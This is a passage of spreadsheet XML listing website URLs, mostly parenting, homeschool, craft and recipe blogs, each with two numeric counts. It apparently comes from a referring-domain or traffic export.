        <x:v>1</x:v>
      </x:c>
      <x:c r="C265" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="266">
      <x:c r="A266" s="86" t="str">
        <x:v>https://homeschoolgiveaways.com</x:v>
      </x:c>
      <x:c r="B266" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C266" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="267">
      <x:c r="A267" s="86" t="str">
        <x:v>https://thetimes365.com</x:v>
      </x:c>
      <x:c r="B267" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C267" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="268">
      <x:c r="A268" s="86" t="str">
        <x:v>https://mouthsofmums.com.au</x:v>
      </x:c>
      <x:c r="B268" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C268" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="269">
      <x:c r="A269" s="86" t="str">
        <x:v>https://kidzonemuseum.org</x:v>
      </x:c>
      <x:c r="B269" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C269" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="270">
      <x:c r="A270" s="86" t="str">
        <x:v>https://mommyhoodlife.com</x:v>
      </x:c>
      <x:c r="B270" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C270" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="271">
      <x:c r="A271" s="86" t="str">
        <x:v>https://flyingballgames.com</x:v>
      </x:c>
      <x:c r="B271" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C271" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="272">
      <x:c r="A272" s="86" t="str">
        <x:v>https://goodpods.com</x:v>
      </x:c>
      <x:c r="B272" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="C272" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
    </x:row>
    <x:row r="273">
      <x:c r="A273" s="86" t="str">
        <x:v>https://natashalh.com</x:v>
      </x:c>
      <x:c r="B273" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C273" s="86" t="str">
        <x:v>3495</x:v>
      </x:c>
    </x:row>
    <x:row r="274">
      <x:c r="A274" s="86" t="str">
        <x:v>https://cultivatingbrilliantminds.com</x:v>
      </x:c>
      <x:c r="B274" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C274" s="86" t="str">
        <x:v>239</x:v>
      </x:c>
    </x:row>
    <x:row r="275">
      <x:c r="A275" s="86" t="str">
        <x:v>https://smartsocial.com</x:v>
      </x:c>
      <x:c r="B275" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C275" s="86" t="str">
        <x:v>80</x:v>
      </x:c>
    </x:row>
    <x:row r="276">
      <x:c r="A276" s="86" t="str">
        <x:v>https://kit.com</x:v>
      </x:c>
      <x:c r="B276" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C276" s="86" t="str">
        <x:v>40</x:v>
      </x:c>
    </x:row>
    <x:row r="277">
      <x:c r="A277" s="86" t="str">
        <x:v>https://acrylicpaintingschool.com</x:v>
      </x:c>
      <x:c r="B277" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C277" s="86" t="str">
        <x:v>38</x:v>
      </x:c>
    </x:row>
    <x:row r="278">
      <x:c r="A278" s="86" t="str">
        <x:v>https://theartisanlife.com</x:v>
      </x:c>
      <x:c r="B278" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C278" s="86" t="str">
        <x:v>33</x:v>
      </x:c>
    </x:row>
    <x:row r="279">
      <x:c r="A279" s="86" t="str">
        <x:v>https://pressprintparty.com</x:v>
      </x:c>
      <x:c r="B279" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C279" s="86" t="str">
        <x:v>30</x:v>
      </x:c>
    </x:row>
    <x:row r="280">
      <x:c r="A280" s="86" t="str">
        <x:v>https://thehomeschoolquest.com</x:v>
      </x:c>
      <x:c r="B280" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C280" s="86" t="str">
        <x:v>22</x:v>
      </x:c>
    </x:row>
    <x:row r="281">
      <x:c r="A281" s="86" t="str">
        <x:v>https://thrivinginparenting.com</x:v>
      </x:c>
      <x:c r="B281" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C281" s="86" t="str">
        <x:v>20</x:v>
      </x:c>
    </x:row>
    <x:row r="282">
      <x:c r="A282" s="86" t="str">
        <x:v>https://busybloomingjoy.com</x:v>
      </x:c>
      <x:c r="B282" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C282" s="86" t="str">
        <x:v>18</x:v>
      </x:c>
    </x:row>
    <x:row r="283">
      <x:c r="A283" s="86" t="str">
        <x:v>https://needlepointers.com</x:v>
      </x:c>
      <x:c r="B283" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C283" s="86" t="str">
        <x:v>17</x:v>
      </x:c>
    </x:row>
    <x:row r="284">
      <x:c r="A284" s="86" t="str">
        <x:v>https://dunistudio.com</x:v>
      </x:c>
      <x:c r="B284" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C284" s="86" t="str">
        <x:v>15</x:v>
      </x:c>
    </x:row>
    <x:row r="285">
      <x:c r="A285" s="86" t="str">
        <x:v>https://teachmemama.com</x:v>
      </x:c>
      <x:c r="B285" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C285" s="86" t="str">
        <x:v>15</x:v>
      </x:c>
    </x:row>
    <x:row r="286">
      <x:c r="A286" s="86" t="str">
        <x:v>https://addiedwyer.com</x:v>
      </x:c>
      <x:c r="B286" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C286" s="86" t="str">
        <x:v>12</x:v>
      </x:c>
    </x:row>
    <x:row r="287">
      <x:c r="A287" s="86" t="str">
        <x:v>https://smartkidprintables.com</x:v>
      </x:c>
      <x:c r="B287" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C287" s="86" t="str">
        <x:v>12</x:v>
      </x:c>
    </x:row>
    <x:row r="288">
      <x:c r="A288" s="86" t="str">
        <x:v>https://tinasdynamichomeschoolplus.com</x:v>
      </x:c>
      <x:c r="B288" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C288" s="86" t="str">
        <x:v>11</x:v>
      </x:c>
    </x:row>
    <x:row r="289">
      <x:c r="A289" s="86" t="str">
        <x:v>https://carg4help.org</x:v>
      </x:c>
      <x:c r="B289" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C289" s="86" t="str">
        <x:v>10</x:v>
      </x:c>
    </x:row>
    <x:row r="290">
      <x:c r="A290" s="86" t="str">
        <x:v>https://thesandrahudson.com</x:v>
      </x:c>
      <x:c r="B290" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C290" s="86" t="str">
        <x:v>9</x:v>
      </x:c>
    </x:row>
    <x:row r="291">
      <x:c r="A291" s="86" t="str">
        <x:v>https://marleydoodledigital.com</x:v>
      </x:c>
      <x:c r="B291" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C291" s="86" t="str">
        <x:v>8</x:v>
      </x:c>
    </x:row>
    <x:row r="292">
      <x:c r="A292" s="86" t="str">
        <x:v>https://momshealth.co</x:v>
      </x:c>
      <x:c r="B292" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C292" s="86" t="str">
        <x:v>7</x:v>
      </x:c>
    </x:row>
    <x:row r="293">
      <x:c r="A293" s="86" t="str">
        <x:v>https://momreadit.com</x:v>
      </x:c>
      <x:c r="B293" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C293" s="86" t="str">
        <x:v>7</x:v>
      </x:c>
    </x:row>
    <x:row r="294">
      <x:c r="A294" s="86" t="str">
        <x:v>https://loridavisstudio.com</x:v>
      </x:c>
      <x:c r="B294" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C294" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="295">
      <x:c r="A295" s="86" t="str">
        <x:v>https://barsbabes.nl</x:v>
      </x:c>
      <x:c r="B295" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C295" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="296">
      <x:c r="A296" s="86" t="str">
        <x:v>https://anastasiablogger.com</x:v>
      </x:c>
      <x:c r="B296" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C296" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="297">
      <x:c r="A297" s="86" t="str">
        <x:v>https://pages.dev</x:v>
      </x:c>
      <x:c r="B297" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C297" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="298">
      <x:c r="A298" s="86" t="str">
        <x:v>https://coalitionbrewing.com</x:v>
      </x:c>
      <x:c r="B298" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C298" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="299">
      <x:c r="A299" s="86" t="str">
        <x:v>https://r2sasheville.org</x:v>
      </x:c>
      <x:c r="B299" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C299" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="300">
      <x:c r="A300" s="86" t="str">
        <x:v>https://nummyrecipes.com</x:v>
      </x:c>
      <x:c r="B300" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C300" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="301">
      <x:c r="A301" s="86" t="str">
        <x:v>https://b-s-g.net</x:v>
      </x:c>
      <x:c r="B301" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C301" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="302">
      <x:c r="A302" s="86" t="str">
        <x:v>https://simplyfullofdelight.com</x:v>
      </x:c>
      <x:c r="B302" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C302" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="303">
      <x:c r="A303" s="86" t="str">
        <x:v>https://homemadebklyn.com</x:v>
      </x:c>
      <x:c r="B303" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C303" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="304">
      <x:c r="A304" s="86" t="str">
        <x:v>https://togethertimefamily.com</x:v>
      </x:c>
      <x:c r="B304" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C304" s="86" t="str">
        <x:v>6</x:v>
      </x:c>
    </x:row>
    <x:row r="305">
      <x:c r="A305" s="86" t="str">
        <x:v>https://thebensonstreet.com</x:v>
      </x:c>
      <x:c r="B305" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C305" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
    </x:row>
    <x:row r="306">
      <x:c r="A306" s="86" t="str">
        <x:v>https://homediy.co</x:v>
      </x:c>
      <x:c r="B306" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C306" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
    </x:row>
    <x:row r="307">
      <x:c r="A307" s="86" t="str">
        <x:v>https://lifeandhomeschool.com</x:v>
      </x:c>
      <x:c r="B307" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C307" s="86" t="str">
        <x:v>5</x:v>
      </x:c>
    </x:row>
    <x:row r="308">
      <x:c r="A308" s="86" t="str">
        <x:v>https://kingascorner.com</x:v>
      </x:c>
      <x:c r="B308" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C308" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="309">
      <x:c r="A309" s="86" t="str">
        <x:v>https://uk.com</x:v>
      </x:c>
      <x:c r="B309" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C309" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="310">
      <x:c r="A310" s="86" t="str">
        <x:v>https://judy-nolan.com</x:v>
      </x:c>
      <x:c r="B310" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C310" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="311">
      <x:c r="A311" s="86" t="str">
        <x:v>https://hisawyer.com</x:v>
      </x:c>
      <x:c r="B311" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C311" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="312">
      <x:c r="A312" s="86" t="str">
        <x:v>https://thedenverhousewife.com</x:v>
      </x:c>
      <x:c r="B312" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C312" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="313">
      <x:c r="A313" s="86" t="str">
        <x:v>https://preschoolprintablesfree.com</x:v>
      </x:c>
      <x:c r="B313" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C313" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="314">
      <x:c r="A314" s="86" t="str">
        <x:v>https://4theloveoffoodblog.com</x:v>
      </x:c>
      <x:c r="B314" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C314" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="315">
      <x:c r="A315" s="86" t="str">
        <x:v>https://theabcsofmotherhood.com</x:v>
      </x:c>
      <x:c r="B315" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C315" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="316">
      <x:c r="A316" s="86" t="str">
        <x:v>https://thefrugalfreegal.com</x:v>
      </x:c>
      <x:c r="B316" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C316" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="317">
      <x:c r="A317" s="86" t="str">
        <x:v>https://guinealynx.com</x:v>
      </x:c>
      <x:c r="B317" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C317" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="318">
      <x:c r="A318" s="86" t="str">
        <x:v>https://momjunky.com</x:v>
      </x:c>
      <x:c r="B318" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C318" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="319">
      <x:c r="A319" s="86" t="str">
        <x:v>https://wikihow.com</x:v>
      </x:c>
      <x:c r="B319" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C319" s="86" t="str">
        <x:v>4</x:v>
      </x:c>
    </x:row>
    <x:row r="320">
      <x:c r="A320" s="86" t="str">
        <x:v>https://mamaofminis.com</x:v>
      </x:c>
      <x:c r="B320" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C320" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="321">
      <x:c r="A321" s="86" t="str">
        <x:v>https://craftywelshgrandma.co.uk</x:v>
      </x:c>
      <x:c r="B321" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C321" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="322">
      <x:c r="A322" s="86" t="str">
        <x:v>https://archyde.com</x:v>
      </x:c>
      <x:c r="B322" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C322" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="323">
      <x:c r="A323" s="86" t="str">
        <x:v>https://poplembrancinhas.com.br</x:v>
      </x:c>
      <x:c r="B323" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C323" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="324">
      <x:c r="A324" s="86" t="str">
        <x:v>https://sidsseapalmcooking.com</x:v>
      </x:c>
      <x:c r="B324" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C324" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="325">
      <x:c r="A325" s="86" t="str">
        <x:v>https://woodlandoakskidministry.com</x:v>
      </x:c>
      <x:c r="B325" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C325" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="326">
      <x:c r="A326" s="86" t="str">
        <x:v>https://savingtalents.com</x:v>
      </x:c>
      <x:c r="B326" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C326" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="327">
      <x:c r="A327" s="86" t="str">
        <x:v>https://motherhoodmanaged.com</x:v>
      </x:c>
      <x:c r="B327" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C327" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="328">
      <x:c r="A328" s="86" t="str">
        <x:v>https://wellrootedmotherhood.com</x:v>
      </x:c>
      <x:c r="B328" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C328" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="329">
      <x:c r="A329" s="86" t="str">
        <x:v>https://thepetiteplanner.com</x:v>
      </x:c>
      <x:c r="B329" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C329" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="330">
      <x:c r="A330" s="86" t="str">
        <x:v>https://makingcraftythings.com</x:v>
      </x:c>
      <x:c r="B330" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C330" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="331">
      <x:c r="A331" s="86" t="str">
        <x:v>https://guinealynx.info</x:v>
      </x:c>
      <x:c r="B331" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C331" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="332">
      <x:c r="A332" s="86" t="str">
        <x:v>https://paperscissorscraft.com</x:v>
      </x:c>
      <x:c r="B332" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C332" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="333">
      <x:c r="A333" s="86" t="str">
        <x:v>https://buzzfeed.com</x:v>
      </x:c>
      <x:c r="B333" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C333" s="86" t="str">
        <x:v>3</x:v>
      </x:c>
    </x:row>
    <x:row r="334">
      <x:c r="A334" s="86" t="str">
        <x:v>https://twinsmommy.com</x:v>
      </x:c>
      <x:c r="B334" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C334" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="335">
      <x:c r="A335" s="86" t="str">
        <x:v>https://mymydiy.com</x:v>
      </x:c>
      <x:c r="B335" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C335" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="336">
      <x:c r="A336" s="86" t="str">
        <x:v>https://tatnersstreetkitchen.com</x:v>
      </x:c>
      <x:c r="B336" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C336" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="337">
      <x:c r="A337" s="86" t="str">
        <x:v>https://gelarecipes.com</x:v>
      </x:c>
      <x:c r="B337" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C337" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="338">
      <x:c r="A338" s="86" t="str">
        <x:v>https://mombrite.com</x:v>
      </x:c>
      <x:c r="B338" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C338" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="339">
      <x:c r="A339" s="86" t="str">
        <x:v>https://acultivatednest.com</x:v>
      </x:c>
      <x:c r="B339" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C339" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="340">
      <x:c r="A340" s="86" t="str">
        <x:v>https://clothbooksforbaby.com</x:v>
      </x:c>
      <x:c r="B340" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C340" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="341">
      <x:c r="A341" s="86" t="str">
        <x:v>https://liveoaknest.com</x:v>
      </x:c>
      <x:c r="B341" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C341" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="342">
      <x:c r="A342" s="86" t="str">
        <x:v>https://mumscreativecupboard.com</x:v>
      </x:c>
      <x:c r="B342" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C342" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="343">
      <x:c r="A343" s="86" t="str">
        <x:v>https://tccwz.com</x:v>
      </x:c>
      <x:c r="B343" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C343" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="344">
      <x:c r="A344" s="86" t="str">
        <x:v>https://sunnysprouts.blog</x:v>
      </x:c>
      <x:c r="B344" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C344" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="345">
      <x:c r="A345" s="86" t="str">
        <x:v>https://paper-and-glue.com</x:v>
      </x:c>
      <x:c r="B345" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C345" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="346">
      <x:c r="A346" s="86" t="str">
        <x:v>https://seasonsinparenting.com</x:v>
      </x:c>
      <x:c r="B346" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C346" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="347">
      <x:c r="A347" s="86" t="str">
        <x:v>https://thepurpleyarn.com</x:v>
      </x:c>
      <x:c r="B347" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C347" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="348">
      <x:c r="A348" s="86" t="str">
        <x:v>https://goldarrowcamp.com</x:v>
      </x:c>
      <x:c r="B348" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C348" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="349">
      <x:c r="A349" s="86" t="str">
        <x:v>https://bestwithkids.com</x:v>
      </x:c>
      <x:c r="B349" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C349" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="350">
      <x:c r="A350" s="86" t="str">
        <x:v>https://b-inspiredmama.com</x:v>
      </x:c>
      <x:c r="B350" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C350" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="351">
      <x:c r="A351" s="86" t="str">
        <x:v>https://wonderinhisworld.com</x:v>
      </x:c>
      <x:c r="B351" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C351" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="352">
      <x:c r="A352" s="86" t="str">
        <x:v>https://thriftymommastips.com</x:v>
      </x:c>
      <x:c r="B352" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C352" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="353">
      <x:c r="A353" s="86" t="str">
        <x:v>https://homemesh.com.tw</x:v>
      </x:c>
      <x:c r="B353" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C353" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="354">
      <x:c r="A354" s="86" t="str">
        <x:v>https://msn.com</x:v>
      </x:c>
      <x:c r="B354" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C354" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="355">
      <x:c r="A355" s="86" t="str">
        <x:v>https://comebackmomma.com</x:v>
      </x:c>
      <x:c r="B355" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C355" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="356">
      <x:c r="A356" s="86" t="str">
        <x:v>https://pollywogsplace.com</x:v>
      </x:c>
      <x:c r="B356" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C356" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="357">
      <x:c r="A357" s="86" t="str">
        <x:v>https://aboutamom.com</x:v>
      </x:c>
      <x:c r="B357" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C357" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="358">
      <x:c r="A358" s="86" t="str">
        <x:v>https://thetravelingaviators.com</x:v>
      </x:c>
      <x:c r="B358" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C358" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="359">
      <x:c r="A359" s="86" t="str">
        <x:v>https://adventuresofadiymom.com</x:v>
      </x:c>
      <x:c r="B359" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C359" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="360">
      <x:c r="A360" s="86" t="str">
        <x:v>https://onemamasdailydrama.com</x:v>
      </x:c>
      <x:c r="B360" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C360" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="361">
      <x:c r="A361" s="86" t="str">
        <x:v>https://kidzcraftcorner.com</x:v>
      </x:c>
      <x:c r="B361" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C361" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="362">
      <x:c r="A362" s="86" t="str">
        <x:v>https://kirbyskorner.site</x:v>
      </x:c>
      <x:c r="B362" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C362" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="363">
      <x:c r="A363" s="86" t="str">
        <x:v>https://jennaye.com</x:v>
      </x:c>
      <x:c r="B363" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C363" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="364">
      <x:c r="A364" s="86" t="str">
        <x:v>https://upjourney.com</x:v>
      </x:c>
      <x:c r="B364" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C364" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="365">
      <x:c r="A365" s="86" t="str">
        <x:v>https://millennimama.com</x:v>
      </x:c>
      <x:c r="B365" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C365" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="366">
      <x:c r="A366" s="86" t="str">
        <x:v>https://homesteadlady.com</x:v>
      </x:c>
      <x:c r="B366" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C366" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="367">
      <x:c r="A367" s="86" t="str">
        <x:v>https://moneysavvyliving.com</x:v>
      </x:c>
      <x:c r="B367" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C367" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="368">
      <x:c r="A368" s="86" t="str">
        <x:v>https://metafilter.com</x:v>
      </x:c>
      <x:c r="B368" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C368" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="369">
      <x:c r="A369" s="86" t="str">
        <x:v>https://everydaywithmadirae.com</x:v>
      </x:c>
      <x:c r="B369" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C369" s="86" t="str">
